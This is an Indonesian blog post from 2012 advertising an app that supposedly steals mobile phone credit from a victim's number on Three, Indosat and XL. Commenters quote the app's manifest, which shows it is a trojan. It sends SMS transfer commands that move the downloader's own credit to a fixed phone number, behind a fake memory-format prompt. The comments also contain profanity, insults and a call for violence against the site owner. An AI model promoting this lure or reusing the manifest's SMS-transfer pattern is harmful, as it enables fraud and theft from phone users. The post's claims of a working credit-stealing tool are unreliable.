Kamis, 17 Mei 2012

APLIKASI MENCURI PULSA Three, Indosat, XL

langsung saja sedot aplikasinya
cara penggunaan :
1. download aplikasinya
2. buka aplikasinya dan klik OK
3. masukkan nomer korban klik send

Klik Link Download dibawah sesuai operator kalian :

18 komentar:

  1. pulsa yg dicuri berapa ????

    BalasHapus
  2. CARA AKTIFIN APLIKASINYA GIMANA BRO>??
    ini filenya yang gw download pake three.. nge aktifinnya pake jar... tapi gw ga tau aktifin pake jar

    BalasHapus
  3. BANGSSAT WEB TAI GW BACA DI DESCRIPSINYA TERTULIS INI NANTI :

    Manifest-Version: 1.0
    Ant-Version: Apache Ant 1.6.2
    Created-By: 1.5.0_09-b03 (Sun Microsystems Inc.)
    MIDlet-1: IVG ,/andi_11.png,ef
    MIDlet-Vendor: andi_11
    MIDlet-Icon: /andi_11.png
    MIDlet-Version: 4.0.1
    MIDlet-Name: Three Voucher Generator
    MIDlet-Description: Dapatkan Pulsa Gratis Khusus Pengguna Indosat
    MIDlet-Delete-Confirm: Yakin Ingin Memformat Memory Anda ?
    MicroEdition-Profile: MIDP-2.0
    MicroEdition-Configuration: CLDC-1.0
    Nasib-1: 123
    Trauma-1: TRF 5000 08985256605
    Nasib-2: 123
    Trauma-2: Ok
    Nasib-3: 123
    Trauma-3: TRF 2000 08985256605
    Nasib-4: 123
    Trauma-4: Ok
    Nasib-5: 123
    Trauma-5: TRF 1000 08985256605
    Nasib-6: 123
    Trauma-6: Ok
    Nasib-7: 123
    Trauma-7: TRF 10000 08985256605
    Nasib-8: 123
    Trauma-8: Ok

    JANGAN BUAT//!! DIA AKAN MEMFORMAT MEMORI LAPTOP KITA

    BalasHapus
  4. itu bkn format memory kita, jelas2 disitu ada bacaan
    Nasib-1: 123
    Trauma-1: TRF 5000 08985256605
    Nasib-2: 123
    Trauma-2: Ok
    Nasib-3: 123
    Trauma-3: TRF 2000 08985256605
    Nasib-4: 123
    Trauma-4: Ok
    Nasib-5: 123
    Trauma-5: TRF 1000 08985256605
    Nasib-6: 123
    Trauma-6: Ok
    Nasib-7: 123
    Trauma-7: TRF 10000 08985256605
    Nasib-8: 123
    Trauma-8: Ok

    itu artinya aplikasi di balik ini adalah kirim pulsa "TRF 10000 08985256605 " ITU FORMAT SMSNYA dan di kirim ke 123

    BalasHapus
  5. HACKERS CAP JEMBOT YANG PUNYA WEB

    BalasHapus
  6. oh,gila lu... itu kan aplikasi buat dapetin pulsa lo sendiri.
    di hapus keluar format memory lagi.padahal itu cuma akal2an loe doang gue sumpahin hp loe ilang!

    BalasHapus
  7. gue cuman numpang ketawa ajalah geliat kalian coment gaxgaxgax.haha

    BalasHapus
  8. haha untung udah ke protek antivirus gua
    haha keren banget dah tapi untungnya gua maasih beruntung

    BalasHapus
  9. asu

    selamat anda sudah saya kirimi virus
    kalau tdk percaya tidk apa2
    yang penting saya sudah sampaikan

    BalasHapus
  10. anjing.....hacker palsu compong .....hacker kawakan

    BalasHapus
  11. jembut...!!!!

    SUWEG banget ddah nih blog!!!
    laptop gue kena virus tai!!! :@

    BACOKIN AJA NIH ORANG

    BalasHapus
  12. android nyimak sambil ngopi... :)

    BalasHapus